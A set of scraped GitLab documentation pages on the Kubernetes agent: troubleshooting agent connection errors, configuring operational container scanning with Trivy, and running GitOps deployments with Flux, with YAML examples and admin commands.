- OCI repositories can follow a well-known versioning scheme, and Flux can be configured to auto-update following that scheme. For example, if you use semantic versioning, Flux can deploy all the minor and patch changes automatically, while major versions require a manual update.
- OCI images can be signed, and the signature can be verified by Flux.
- OCI repositories can be scanned by the container registry, even after the image is built.
- The job that builds the OCI container enables using well-known release management features that regular GitOps tools don't support, like [protected environments](../../../ci/environments/protected_environments.md), [deployment approvals](../../../ci/environments/deployment_approvals.md), and [deployment freeze windows](../../project/releases/_index.md#prevent-unintentional-releases-by-setting-a-deploy-freeze).

## Pipeline-based deployments

If you need to use a pipeline-based deployment, follow these best practices:

- To reduce the number of agents deployed per cluster, share the agent connection across your groups and projects.
  If possible, use only one agent deployment per cluster.
- Use impersonation, and minimize the access of CI/CD jobs in the cluster by using regular Kubernetes RBAC.
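As a sketch of the OCI-based flow recommended above, a Flux `OCIRepository` that tracks semantic versions and verifies image signatures might look like this — the registry path and version range are illustrative assumptions:

```yaml
apiVersion: source.toolkit.fluxcd.io/v1beta2
kind: OCIRepository
metadata:
  name: app-manifests
  namespace: flux-system
spec:
  interval: 10m
  # Hypothetical GitLab container registry path for the manifest image
  url: oci://registry.gitlab.com/my-group/my-project/manifests
  ref:
    # Follow new minor and patch releases automatically;
    # a major version bump requires editing this range
    semver: ">=1.0.0 <2.0.0"
  # Verify Cosign signatures before the source is made available to Flux
  verify:
    provider: cosign
```

With a `semver` range, Flux picks up minor and patch releases automatically, while major version bumps require a manual change — matching the promotion behavior described in the OCI containers section above.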
https://docs.gitlab.com/user/clusters/troubleshooting
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/troubleshooting.md
2025-08-13
doc/user/clusters/agent
troubleshooting.md
Deploy
Environments
Troubleshooting the GitLab agent for Kubernetes
When you are using the GitLab agent for Kubernetes, you might experience issues you need to troubleshoot. You can start by viewing the service logs: ```shell kubectl logs -f -l=app.kubernetes.io/name=gitlab-agent -n gitlab-agent ``` If you are a GitLab administrator, you can also view the [GitLab agent server for Kubernetes logs](../../../administration/clusters/kas.md#troubleshooting). ## Transport: Error while dialing failed to WebSocket dial ```json { "level": "warn", "time": "2020-11-04T10:14:39.368Z", "msg": "GetConfiguration failed", "error": "rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://gitlab-kas:443/-/kubernetes-agent\\\": dial tcp: lookup gitlab-kas on 10.60.0.10:53: no such host\"" } ``` This error occurs when there are connectivity issues between the `kas-address` and your agent pod. To fix this issue, make sure the `kas-address` is accurate. ```json { "level": "error", "time": "2021-06-25T21:15:45.335Z", "msg": "Reverse tunnel", "mod_name": "reverse_tunnel", "error": "Connect(): rpc error: code = Unavailable desc = connection error: desc= \"transport: Error while dialing failed to WebSocket dial: expected handshake response status code 101 but got 301\"" } ``` This error occurs when the `kas-address` doesn't include a trailing slash. To fix this issue, make sure that the `wss` or `ws` URL ends with a trailing slash, like `wss://GitLab.host.tld:443/-/kubernetes-agent/` or `ws://GitLab.host.tld:80/-/kubernetes-agent/`. 
## Error while dialing failed to WebSocket dial: failed to send handshake request

```json
{
  "level": "warn",
  "time": "2020-10-30T09:50:51.173Z",
  "msg": "GetConfiguration failed",
  "error": "rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://GitLabhost.tld:443/-/kubernetes-agent\\\": net/http: HTTP/1.x transport connection broken: malformed HTTP response \\\"\\\\x00\\\\x00\\\\x06\\\\x04\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x05\\\\x00\\\\x00@\\\\x00\\\"\""
}
```

This error occurs when you configured `wss` as `kas-address` on the agent side, but the agent server is not available at `wss`. To fix this issue, make sure the same schemes are configured on both sides.

## Decompressor is not installed for grpc-encoding

```json
{
  "level": "warn",
  "time": "2020-11-05T05:25:46.916Z",
  "msg": "GetConfiguration.Recv failed",
  "error": "rpc error: code = Unimplemented desc = grpc: Decompressor is not installed for grpc-encoding \"gzip\""
}
```

This error occurs when the version of the agent is newer than the version of the agent server (KAS). To fix it, make sure that both `agentk` and the agent server are the same version.

## Certificate signed by unknown authority

```json
{
  "level": "error",
  "time": "2021-02-25T07:22:37.158Z",
  "msg": "Reverse tunnel",
  "mod_name": "reverse_tunnel",
  "error": "Connect(): rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://GitLabhost.tld:443/-/kubernetes-agent/\\\": x509: certificate signed by unknown authority\""
}
```

This error occurs when your GitLab instance is using a certificate signed by an internal certificate authority that is unknown to the agent.
To fix this issue, you can present the CA certificate file to the agent by [customizing the Helm installation](install/_index.md#customize-the-helm-installation). Add `--set-file config.kasCaCert=my-custom-ca.pem` to the `helm install` command. The file should be a valid PEM or DER-encoded certificate. When you deploy `agentk` with a set `config.kasCaCert` value, the certificate is added to `configmap` and the certificate file is mounted in `/etc/ssl/certs`. For example, with the command `kubectl get configmap -lapp=gitlab-agent -o yaml`: ```yaml apiVersion: v1 items: - apiVersion: v1 data: ca.crt: |- -----BEGIN CERTIFICATE----- MIIFmzCCA4OgAwIBAgIUE+FvXfDpJ869UgJitjRX7HHT84cwDQYJKoZIhvcNAQEL ...truncated certificate... GHZCTQkbQyUwBWJOUyOxW1lro4hWqtP4xLj8Dpq1jfopH72h0qTGkX0XhFGiSaM= -----END CERTIFICATE----- kind: ConfigMap metadata: annotations: meta.helm.sh/release-name: self-signed meta.helm.sh/release-namespace: gitlab-agent-self-signed creationTimestamp: "2023-03-07T20:12:26Z" labels: app: gitlab-agent app.kubernetes.io/managed-by: Helm app.kubernetes.io/name: gitlab-agent app.kubernetes.io/version: v15.9.0 helm.sh/chart: gitlab-agent-1.11.0 name: self-signed-gitlab-agent resourceVersion: "263184207" kind: List ``` You might see a similar error in the [agent server (KAS) logs](../../../administration/logs/_index.md#gitlab-agent-server-for-kubernetes) of your GitLab application server: ```json {"level":"error","time":"2023-03-07T20:19:48.151Z","msg":"AgentInfo()","grpc_service":"gitlab.agent.agent_configuration.rpc.AgentConfiguration","grpc_method":"GetConfiguration","error":"Get \"https://gitlab.example.com/api/v4/internal/kubernetes/agent_info\": x509: certificate signed by unknown authority"} ``` To fix it, [install the public certificate of your internal CA](https://docs.gitlab.com/omnibus/settings/ssl/#install-custom-public-certificates) in the `/etc/gitlab/trusted-certs` directory. 
Alternatively, you can configure the agent server (KAS) to read the certificate from a custom directory. Add the following configuration to `/etc/gitlab/gitlab.rb`: ```ruby gitlab_kas['env'] = { 'SSL_CERT_DIR' => "/opt/gitlab/embedded/ssl/certs/" } ``` To apply the changes: 1. Reconfigure GitLab. ```shell sudo gitlab-ctl reconfigure ``` 1. Restart `gitlab-kas`. ```shell gitlab-ctl restart gitlab-kas ``` ## Error: `Failed to register agent pod` The agent pod logs might display the error message `Failed to register agent pod. Please make sure the agent version matches the server version`. To resolve this issue, ensure that the agent version matches the GitLab version. If the versions match and the error persists: 1. Make sure `gitlab-kas` is running with `gitlab-ctl status gitlab-kas`. 1. Check the `gitlab-kas` [logs](../../../administration/logs/_index.md#gitlab-agent-server-for-kubernetes) to make sure the agent is functioning properly. ## Failed to perform vulnerability scan on workload: jobs.batch already exists ```json { "level": "error", "time": "2022-06-22T21:03:04.769Z", "msg": "Failed to perform vulnerability scan on workload", "mod_name": "starboard_vulnerability", "error": "running scan job: creating job: jobs.batch \"scan-vulnerabilityreport-b8d497769\" already exists" } ``` The GitLab agent for Kubernetes performs vulnerability scans by creating a job to scan each workload. If a scan is interrupted, these jobs may be left behind and need to be cleaned up before more jobs can be run. 
You can clean up these jobs by running: ```shell kubectl delete jobs -l app.kubernetes.io/managed-by=starboard -n gitlab-agent ``` [We're working on making the cleanup of these jobs more robust.](https://gitlab.com/gitlab-org/gitlab/-/issues/362016) ## Parse error during installation When you install the agent, you might encounter an error that states: ```shell Error: parse error at (gitlab-agent/templates/observability-secret.yaml:1): unclosed action ``` This error is typically caused by an incompatible version of Helm. To resolve the issue, ensure that you are using a version of Helm [compatible with your version of Kubernetes](_index.md#supported-kubernetes-versions-for-gitlab-features). ## `GitLab Agent Server: Unauthorized` error on Dashboard for Kubernetes An error like `GitLab Agent Server: Unauthorized. Trace ID: <...>` on the [Dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md) page might be caused by one of the following: - The `user_access` entry in the agent configuration file doesn't exist or is wrong. To resolve, see [Grant users Kubernetes access](user_access.md). - There are multiple [`_gitlab_kas` cookies](../../../administration/clusters/kas.md#kubernetes-api-proxy-cookie) in the browser and sent to KAS. The most likely cause is multiple GitLab instances hosted on the same site. For example, `gitlab.com` set a `_gitlab_kas` cookie targeted for `kas.gitlab.com`, but the cookie is also sent to `kas.staging.gitlab.com`, which causes the error on `staging.gitlab.com`. To temporarily resolve, delete the `_gitlab_kas` cookie for `gitlab.com` from the browser cookie store. [Issue 418998](https://gitlab.com/gitlab-org/gitlab/-/issues/418998) proposes a fix for this known issue. - GitLab and KAS run on different sites. For example, GitLab on `gitlab.example.com` and KAS on `kas.example.com`. GitLab does not support this use case. For details, see [issue 416436](https://gitlab.com/gitlab-org/gitlab/-/issues/416436). 
## Agent version mismatch In GitLab, on the **Agent** tab of the Kubernetes clusters page, you might see a warning that says `Agent version mismatch: The agent versions do not match each other across your cluster's pods.` This warning might be caused by an older version of the agent being cached by the agent server for Kubernetes (`kas`). Because `kas` periodically deletes outdated agent versions, you should wait at least 20 minutes for the agent and GitLab to reconcile. If the warning persists, update the agent installed on your cluster. ## Kubernetes API proxy response headers are lost or blocked HTTP response headers might get blocked when sent from the Kubernetes cluster to the user through the Kubernetes API proxy. This error likely occurs when a response header is not included in the default allowlist for KAS. For steps on how to resolve this issue, see [blocked response headers](../../../administration/clusters/kas.md#error-blocked-kubernetes-api-proxy-response-header).
https://docs.gitlab.com/user/clusters/vulnerabilities
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/vulnerabilities.md
2025-08-13
doc/user/clusters/agent
vulnerabilities.md
Application Security Testing
Composition analysis
Operational container scanning
Scans container images in a Kubernetes cluster for vulnerabilities.
{{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/368828) the starboard directive in GitLab 15.4. The starboard directive is scheduled for removal in GitLab 16.0. {{< /history >}} ## Supported architectures In GitLab agent for Kubernetes 16.10.0 and later and GitLab agent Helm Chart 1.25.0 and later, operational container scanning (OCS) is supported for `linux/arm64` and `linux/amd64`. For earlier versions, only `linux/amd64` is supported. ## Enable operational container scanning You can use OCS to scan container images in your cluster for security vulnerabilities. In GitLab agent for Kubernetes 16.9 and later, OCS uses a [wrapper image](https://gitlab.com/gitlab-org/security-products/analyzers/trivy-k8s-wrapper) around [Trivy](https://github.com/aquasecurity/trivy) to scan images for vulnerabilities. Before GitLab 16.9, OCS directly used the [Trivy](https://github.com/aquasecurity/trivy) image. OCS can be configured to run on a cadence by using `agent config` or a project's scan execution policy. {{< alert type="note" >}} If both `agent config` and `scan execution policies` are configured, the configuration from `scan execution policy` takes precedence. {{< /alert >}} ### Enable via agent configuration To enable scanning of images within your Kubernetes cluster via the agent configuration, add a `container_scanning` configuration block to your agent configuration with a `cadence` field containing a [CRON expression](https://en.wikipedia.org/wiki/Cron) for when the scans are run. ```yaml container_scanning: cadence: '0 0 * * *' # Daily at 00:00 (Kubernetes cluster time) ``` The `cadence` field is required. 
GitLab supports the following types of CRON syntax for the cadence field:

- A daily cadence of once per day at a specified hour, for example: `0 18 * * *`
- A weekly cadence of once per week on a specified day and at a specified hour, for example: `0 13 * * 0`

{{< alert type="note" >}}

Other elements of the [CRON syntax](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) may work in the cadence field if they are supported by the [cron](https://github.com/robfig/cron) library used in the implementation, but GitLab does not officially test or support them.

{{< /alert >}}

{{< alert type="note" >}}

The CRON expression is evaluated in [UTC](https://www.timeanddate.com/worldclock/timezone/utc) using the system time of the Kubernetes agent pod.

{{< /alert >}}

By default, operational container scanning does not scan any workloads for vulnerabilities. To select which namespaces are scanned, set the `namespaces` field in the `vulnerability_report` block. For example, to scan only the `default` and `kube-system` namespaces, use this configuration:

```yaml
container_scanning:
  cadence: '0 0 * * *'
  vulnerability_report:
    namespaces:
      - default
      - kube-system
```

For every target namespace, all images in the following workload resources are scanned by default:

- Pod
- ReplicaSet
- ReplicationController
- StatefulSet
- DaemonSet
- CronJob
- Job

This can be customized by [configuring Trivy Kubernetes resource detection](#configure-trivy-kubernetes-resource-detection).

### Enable via scan execution policies

To enable scanning of images in your Kubernetes cluster by using scan execution policies, use the [scan execution policy editor](../../application_security/policies/scan_execution_policies.md#scan-execution-policy-editor) to create a new schedule rule.
{{< alert type="note" >}}

The Kubernetes agent must be running in your cluster to scan running container images.

{{< /alert >}}

{{< alert type="note" >}}

Operational container scanning operates independently of GitLab pipelines. It is fully automated and managed by the Kubernetes agent, which initiates new scans at the scheduled time configured in the scan execution policy. The agent creates a dedicated Job in your cluster to perform the scan and report findings back to GitLab.

{{< /alert >}}

Here is an example of a policy that enables operational container scanning in the cluster the Kubernetes agent is attached to:

```yaml
- name: Enforce Container Scanning in cluster connected through my-gitlab-agent for default and kube-system namespaces
  enabled: true
  rules:
    - type: schedule
      cadence: '0 10 * * *'
      agents:
        <agent-name>:
          namespaces:
            - 'default'
            - 'kube-system'
  actions:
    - scan: container_scanning
```

The keys for a schedule rule are:

- `cadence` (required): a [CRON expression](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) for when the scans are run.
- `agents:<agent-name>` (required): the name of the agent to use for scanning.
- `agents:<agent-name>:namespaces` (required): the Kubernetes namespaces to scan.

{{< alert type="note" >}}

Other elements of the [CRON syntax](https://docs.oracle.com/cd/E12058_01/doc/doc.1014/e12030/cron_expressions.htm) may work in the cadence field if they are supported by the [cron](https://github.com/robfig/cron) library used in the implementation, but GitLab does not officially test or support them.

{{< /alert >}}

{{< alert type="note" >}}

The CRON expression is evaluated in [UTC](https://www.timeanddate.com/worldclock/timezone/utc) using the system time of the Kubernetes agent pod.

{{< /alert >}}

You can view the complete schema in the [scan execution policy documentation](../../application_security/policies/scan_execution_policies.md#scan-execution-policies-schema).
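Before committing a cadence change, you can sanity-check the value locally against the two officially supported shapes (daily and weekly, as noted above). This is an illustrative sketch only — the regexes and the `is_supported_cadence` helper are not part of GitLab:

```python
import re

# Daily form "0 H * * *" and weekly form "0 H * * D", where H is 0-23
# and D is 0-6. Anything else may work but is unsupported per the docs.
_DAILY = re.compile(r"^0 (?:[01]?\d|2[0-3]) \* \* \*$")
_WEEKLY = re.compile(r"^0 (?:[01]?\d|2[0-3]) \* \* [0-6]$")


def is_supported_cadence(expr: str) -> bool:
    """Return True if `expr` matches an officially supported cadence form."""
    return bool(_DAILY.match(expr) or _WEEKLY.match(expr))


print(is_supported_cadence("0 18 * * *"))   # daily at 18:00 -> True
print(is_supported_cadence("0 13 * * 0"))   # weekly, Sunday 13:00 -> True
print(is_supported_cadence("*/5 * * * *"))  # not officially supported -> False
```

A check like this could run in a lint job before the agent configuration or policy file is merged.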
## OCS vulnerability resolution for multi-cluster configurations

To ensure accurate vulnerability tracking with OCS, create a separate GitLab project with OCS enabled for each cluster. If you have multiple clusters, use one project per cluster.

After each scan, OCS resolves vulnerabilities that are no longer found in your cluster by comparing the current scan's vulnerabilities with those previously detected. Any vulnerabilities from earlier scans that are no longer present in the current scan are resolved for the GitLab project. If multiple clusters are configured in the same project, an OCS scan in one cluster (for example, cluster A) would resolve previously detected vulnerabilities from another cluster (for example, cluster B), leading to incorrect vulnerability reporting.

## Configure scanner resource requirements

By default, the scanner pod's resource requirements are:

```yaml
requests:
  cpu: 100m
  memory: 100Mi
  ephemeral_storage: 1Gi
limits:
  cpu: 500m
  memory: 500Mi
  ephemeral_storage: 3Gi
```

You can customize them with a `resource_requirements` field:

```yaml
container_scanning:
  resource_requirements:
    requests:
      cpu: '0.2'
      memory: 200Mi
      ephemeral_storage: 2Gi
    limits:
      cpu: '0.7'
      memory: 700Mi
      ephemeral_storage: 4Gi
```

When using a fractional value for CPU, format the value as a string.

{{< alert type="note" >}}

- Resource requirements can only be set by using the agent configuration. If you enabled operational container scanning through scan execution policies and need to configure resource requirements, do so in the agent configuration file.
- When using Google Kubernetes Engine (GKE) for Kubernetes orchestration, [the ephemeral storage limit is always set equal to the request value](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-resource-requests#resource-limits). This is enforced by GKE.
{{< /alert >}}

## Custom repository for Trivy K8s Wrapper

During a scan, OCS deploys pods using an image from the [Trivy K8s Wrapper repository](https://gitlab.com/security-products/trivy-k8s-wrapper/container_registry/5992609), which transmits the vulnerability report generated by [Trivy Kubernetes](https://aquasecurity.github.io/trivy/v0.54/docs/target/kubernetes) to OCS. If your cluster's firewall restricts access to the Trivy K8s Wrapper repository, you can configure OCS to pull the image from a custom repository. Ensure that the custom repository mirrors the Trivy K8s Wrapper repository for compatibility.

```yaml
container_scanning:
  trivy_k8s_wrapper_image:
    repository: "your-custom-registry/your-image-path"
```

## Configure scan timeout

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/497460) in GitLab 17.7.

{{< /history >}}

By default, the Trivy scan times out after five minutes. The agent itself provides an extra 15 minutes to read the chained configmaps and transmit the vulnerabilities.

To customize the Trivy timeout duration, specify the duration in seconds with the `scanner_timeout` field. For example:

```yaml
container_scanning:
  scanner_timeout: "3600s" # 60 minutes
```

## Configure Trivy report size

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/497460) in GitLab 17.7.

{{< /history >}}

By default, the Trivy report is limited to 100 MB, which is sufficient for most scans. However, if you have a lot of workloads, you might need to increase the limit.

To do this, specify the limit in bytes with the `report_max_size` field. For example:

```yaml
container_scanning:
  report_max_size: "300000000" # 300 MB
```

## Configure Trivy Kubernetes resource detection

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/431707) in GitLab 17.9.
{{< /history >}}

By default, Trivy looks for the following Kubernetes resource types to discover scannable images:

- Pod
- ReplicaSet
- ReplicationController
- StatefulSet
- DaemonSet
- CronJob
- Job
- Deployment

You can limit the Kubernetes resource types that Trivy discovers, for example to scan only "active" images.

To do this, specify the resource types with the `resource_types` field:

```yaml
container_scanning:
  vulnerability_report:
    resource_types:
      - Deployment
      - Pod
      - Job
```

## Configure Trivy report artifact deletion

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/480845) in GitLab 17.9.

{{< /history >}}

By default, the GitLab agent for Kubernetes deletes the Trivy report artifact after a scan has completed. You can configure the agent to preserve the report artifact, so you can view the report in its raw state.

To do this, set `delete_report_artifact` to `false`:

```yaml
container_scanning:
  delete_report_artifact: false
```

## View cluster vulnerabilities

To view vulnerability information in GitLab:

1. On the left sidebar, select **Search or go to** and find the project that contains the agent configuration file.
1. Select **Operate > Kubernetes clusters**.
1. Select the **Agent** tab.
1. Select an agent to view the cluster vulnerabilities.

![Cluster agent security tab UI](img/cluster_agent_security_tab_v14_8.png)

This information can also be found under [operational vulnerabilities](../../application_security/vulnerability_report/_index.md#operational-vulnerabilities).

{{< alert type="note" >}}

You must have at least the Developer role.

{{< /alert >}}

## Scanning private images

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/415451) in GitLab 16.4.

{{< /history >}}

To scan private images, the scanner relies on the image pull secrets (direct references and from the service account) to pull the image.
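Because the scanner reuses the workload's image pull secrets, scanning private images usually comes down to making sure a registry credential exists in the scanned namespace. A minimal sketch of such a secret (the name, namespace, and placeholder value are hypothetical):

```yaml
apiVersion: v1
kind: Secret
metadata:
  name: gitlab-registry-credentials  # hypothetical name
  namespace: default                 # a namespace selected for scanning
type: kubernetes.io/dockerconfigjson
data:
  .dockerconfigjson: <base64-encoded Docker config with registry credentials>
```

The workload then references the secret directly through `imagePullSecrets`, or the secret is attached to the namespace's service account — the two sources the scanner relies on.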
## Known issues

In GitLab agent for Kubernetes 16.9 and later, operational container scanning:

- Handles Trivy reports of up to 100 MB. For previous releases, this limit is 10 MB.
- Is disabled when the GitLab agent for Kubernetes runs in `fips` mode.

## Troubleshooting

### `Error running Trivy scan. Container terminated reason: OOMKilled`

OCS might fail with an OOM error if there are too many resources to be scanned or if the images being scanned are large.

To resolve this, [configure the resource requirements](#configure-scanner-resource-requirements) to increase the amount of memory available.

### `Pod ephemeral local storage usage exceeds the total limit of containers`

OCS scans could fail for Kubernetes clusters that have low default ephemeral storage. For example, [GKE Autopilot](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-resource-requests#defaults) sets the default ephemeral storage to 1 GB. This is an issue for OCS when scanning namespaces with large images, because there might not be enough space to store all the data OCS needs.

To resolve this, [configure the resource requirements](#configure-scanner-resource-requirements) to increase the amount of ephemeral storage available.

Another message indicative of this issue is: `OCS Scanning pod evicted due to low resources. Please configure higher resource limits.`

### `Error running Trivy scan due to context timeout`

OCS might fail to complete a scan if Trivy takes too long. The default scan timeout is 5 minutes, with an extra 15 minutes for the agent to read the results and transmit the vulnerabilities.

To resolve this, [configure the scanner timeout](#configure-scan-timeout) to increase the time allowed for the scan.

### `trivy report size limit exceeded`

OCS might fail with this error if the generated Trivy report is larger than the default maximum limit.
To resolve this, [configure the max Trivy report size](#configure-trivy-report-size) to increase the maximum allowed size of the Trivy report.
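When raising the limit, it helps to double-check the byte count before putting it in `report_max_size`, since the field takes bytes as a string. A tiny sketch (the helper name is hypothetical; decimal megabytes match the `"300000000" # 300 MB` configuration example earlier):

```python
def report_max_size_value(megabytes: int) -> str:
    """Convert decimal megabytes to the byte string the `report_max_size`
    field expects (1 MB = 1_000_000 bytes, matching "300000000" being
    labeled 300 MB in the configuration example)."""
    return str(megabytes * 1_000_000)


value = report_max_size_value(300)
assert value == "300000000"  # the 300 MB example above
```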
---
stage: Application Security Testing
group: Composition analysis
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
description: Scans container images in a Kubernetes cluster for vulnerabilities.
title: Operational container scanning
---
https://docs.gitlab.com/user/clusters/gitops
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/gitops.md
2025-08-13
doc/user/clusters/agent
gitops.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using GitOps with a Kubernetes cluster
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/346567) from GitLab Premium to GitLab Free in 15.3.
- [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346585) to make the `id` attribute optional in GitLab 15.7.
- Specifying a branch, tag, or commit reference to fetch the Kubernetes manifest files [introduced](https://gitlab.com/groups/gitlab-org/-/epics/4516) in GitLab 15.7.
- [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/395364) in GitLab 16.1 to prioritize Flux for GitOps.

{{< /history >}}

GitLab integrates [Flux](https://fluxcd.io/flux/) for GitOps. To get started with Flux, see the [Flux for GitOps tutorial](getting_started.md).

With GitOps, you can manage containerized clusters and applications from a Git repository that:

- Is the single source of truth of your system.
- Is the single place where you operate your system.

By combining GitLab, Kubernetes, and GitOps, you can have:

- GitLab as the GitOps operator.
- Kubernetes as the automation and convergence system.
- GitLab CI/CD for Continuous Integration.
- The agent for Continuous Deployment and cluster observability.
- Built-in automatic drift remediation.
- Resource management with [server-side applies](https://kubernetes.io/docs/reference/using-api/server-side-apply/) for transparent multi-actor field management.

## Deployment sequence

This diagram shows the repositories and main actors in a GitOps deployment:

```mermaid
%%{init: { "fontFamily": "GitLab Sans" }}%%
sequenceDiagram
    accTitle: Deployment sequence
    accDescr: Shows the repositories and main actors in a GitOps deployment.

    participant D as Developer
    participant A as Application code repository
    participant M as Deployment repository
    participant R as OCI registry
    participant C as Agent configuration repository
    participant K as GitLab agent
    participant F as Flux

    loop Regularly
        K-->>C: Grab the configuration
    end
    D->>+A: Pushing code changes
    A->>M: Updating manifest
    M->>R: Build an OCI artifact
    M->>K: Notify
    K->>F: Notify and watch sync
    R-->>F: Pulling and applying changes
    K->>M: Notify after sync
```

You should use both Flux and `agentk` for GitOps deployments. Flux keeps the cluster state synchronized with the source, while `agentk` simplifies the Flux setup, provides cluster-to-GitLab access management, and visualizes the cluster state in the GitLab UI.

### OCI for source control

You should use OCI images as the source for Flux, instead of a Git repository. The [GitLab container registry](../../packages/container_registry/_index.md) supports OCI images.

| OCI registry | Git repository |
| --- | --- |
| Designed to serve container images at scale. | Designed to version and store source code. |
| Immutable, supports security scans. | Mutable. |
| The default Git branch can store cluster state without triggering a sync. | The default Git branch triggers a sync when used to store cluster state. |

## Repository structure

To simplify configuration, use one delivery repository per team. You can package the delivery repository into multiple OCI images per application. For additional repository structure recommendations, see the [Flux documentation](https://fluxcd.io/flux/guides/repository-structure/).

## Immediate Git repository reconciliation

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/392852) in GitLab 16.1 with a [flag](../../../administration/feature_flags/_index.md) named `notify_kas_on_git_push`. Disabled by default.
- [Enabled on GitLab.com and GitLab Self-Managed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/126527) in GitLab 16.2.
- [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/410429) in GitLab 16.3.

{{< /history >}}

Usually, the Flux source controller reconciles Git repositories at configured intervals. This can cause delays between a `git push` and the reconciliation of the cluster state, and results in unnecessary pulls from GitLab.

The agent for Kubernetes automatically detects Flux `GitRepository` objects that reference GitLab projects in the instance the agent is connected to, and configures a [`Receiver`](https://fluxcd.io/flux/components/notification/receivers/) for the instance. When the agent for Kubernetes detects a `git push` to a repository it has access to, the `Receiver` is triggered and Flux reconciles the cluster with any changes to the repository.

To use immediate Git repository reconciliation, you must have a Kubernetes cluster that runs:

- The agent for Kubernetes.
- Flux `source-controller` and `notification-controller`.

Immediate Git repository reconciliation can reduce the time between a push and reconciliation, but it doesn't guarantee that every `git push` event is received. You should still set [`GitRepository.spec.interval`](https://fluxcd.io/flux/components/source/gitrepositories/#interval) to an acceptable duration.

{{< alert type="note" >}}

The agent only has access to the agent configuration project and all public projects. The agent cannot immediately reconcile any private projects, except the agent configuration project. Allowing the agent to access private projects is proposed in [issue 389393](https://gitlab.com/gitlab-org/gitlab/-/issues/389393).

{{< /alert >}}

### Custom webhook endpoints

When the agent for Kubernetes calls the `Receiver` webhook, the agent defaults to `http://webhook-receiver.flux-system.svc.cluster.local`, which is also the default URL set by a Flux bootstrap installation. To configure a custom endpoint, set `flux.webhook_receiver_url` to a URL that the agent can resolve.
For example:

```yaml
flux:
  webhook_receiver_url: http://webhook-receiver.another-flux-namespace.svc.cluster.local
```

There is special handling for [service proxy URLs](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster-services/) configured in this format: `/api/v1/namespaces/[^/]+/services/[^/]+/proxy`. For example:

```yaml
flux:
  webhook_receiver_url: /api/v1/namespaces/flux-system/services/http:webhook-receiver:80/proxy
```

In these cases, the agent for Kubernetes uses the available Kubernetes configuration and context to connect to the API endpoint. You can use this if you run an agent outside a cluster and you haven't [configured an `Ingress`](https://fluxcd.io/flux/guides/webhook-receivers/#expose-the-webhook-receiver) for the Flux notification controller.

{{< alert type="warning" >}}

You should configure only trusted service proxy URLs. When you provide a service proxy URL, the agent for Kubernetes sends typical Kubernetes API requests, which include the credentials necessary to authenticate with the API service.

{{< /alert >}}

## Token management

To use certain Flux features, you might need multiple access tokens. Additionally, you can use multiple token types to achieve the same result. This section provides guidelines for the tokens you might need, and provides token type recommendations where possible.

### GitLab access by Flux

To access the GitLab container registry or Git repositories, Flux can use:

- A project or group deploy token.
- A project or group deploy key.
- A project or group access token.
- A personal access token.

The token does not need write access. You should use project deploy tokens if HTTP access is possible. If you require `git+ssh` access, you should use deploy keys. To compare deploy keys and deploy tokens, see [Deploy keys](../../project/deploy_keys/_index.md).
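As an illustration of the deploy token recommendation, the token can be stored as a basic-auth secret that a Flux `GitRepository` references. This is a sketch with hypothetical resource names and URL; Flux expects `username` and `password` keys for HTTP basic auth:

```yaml
apiVersion: v1
kind: Secret
metadata:
  name: gitlab-deploy-token  # hypothetical name
  namespace: flux-system
type: Opaque
stringData:
  username: gitlab+deploy-token-1  # the generated deploy token username
  password: <deploy-token>
---
apiVersion: source.toolkit.fluxcd.io/v1
kind: GitRepository
metadata:
  name: my-deployments             # hypothetical repository object
  namespace: flux-system
spec:
  interval: 10m                    # fallback cadence; immediate reconciliation shortens typical latency
  url: https://gitlab.example.com/my-group/my-deployments.git
  ref:
    branch: main
  secretRef:
    name: gitlab-deploy-token
```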
